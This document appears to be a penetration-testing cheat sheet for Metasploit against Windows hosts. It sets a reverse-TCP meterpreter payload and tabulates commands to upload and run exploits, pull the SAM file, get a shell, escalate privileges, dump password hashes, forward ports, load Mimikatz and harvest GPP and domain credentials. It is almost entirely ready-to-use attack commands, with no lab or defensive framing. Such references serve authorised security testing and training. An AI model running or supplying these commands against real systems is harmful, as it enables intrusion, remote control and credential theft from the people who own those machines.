Metasploit
Windows reverse meterpreter payload
set payload windows/meterpreter/reverse_tcp
Useful meterpreter commands.
Command
Description
upload file c:\\windows
Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe
Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c
Creates new channel with cmd shell
ps
Meterpreter show processes
shell
Meterpreter get shell on the target
getsystem
Meterpreter attempts priviledge escalation the target
hashdump
Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target
Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target
Meterpreter delete port forward
Post Exploit Windows Metasploit Modules
Windows Metasploit Modules for privilege escalation.
Command
Description
run post/windows/gather/win_privs
Metasploit show privileges of current user
use post/windows/gather/credentials/gpp
Metasploit grab GPP saved passwords
load mimikatz -> wdigest
Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum
Identify other machines that the supplied domain user has administrative access to
run post/windows/gather/smart_hashdump
dump credentials
Last updated